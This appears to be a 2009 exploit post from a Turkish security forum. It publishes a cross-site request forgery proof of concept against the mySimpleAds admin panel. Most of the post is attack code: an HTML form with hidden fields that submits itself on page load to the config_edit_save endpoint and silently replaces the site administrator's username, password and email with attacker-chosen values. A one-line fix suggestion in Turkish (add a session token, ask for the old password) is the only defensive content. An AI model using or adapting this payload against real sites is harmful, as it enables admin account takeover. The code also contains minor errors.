mySimpleAds ~ XSRF | Cyber-Warrior Information Technology's World

Root > Exploits / Vulnerabilities > mySimpleAds ~ XSRF

Madde
	Author : Bug Researchers/BizaRRo
	Date : 03.02.2009 00:26:57
	# mySimpleAds ~ XSRF [Full Screen Display]

	< ------------------- header data start ------------------- > ############################################################# # Application Name : mySimpleAds # Vulnerable Type : XSRF # Infection : Uzaktan otomatik olarak admin pass change edilebilir. # Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli, eski sifre sorulmalidir. # author : Bug Researchers/BizaRRo ############################################################# < ------------------- header data end of ------------------- > < -- bug code start -- > <b0dy onLoad=Submit();> <script>function Submit[]{document.BizaRRo.submit();}</script> <form class=wufoo name=ads action=http://www.SITE.net/[PATCH]/admin/index.php?a=config_edit_save method=POST> <input class=field text medium type=hidden maxlength=255 value=addadd name=config_admin_uname /> <input class=field text medium type=hidden maxlength=255 value=addadd name=config_admin_pass /> <input class=field text medium type=hidden maxlength=255 value=addadd name=config_admin_pass_confirm /> <input class=field text medium type=hidden maxlength=255 value=add@add.com name=config_admin_email /> <input type=submit name=save value=Save /> < -- bug code end of -- >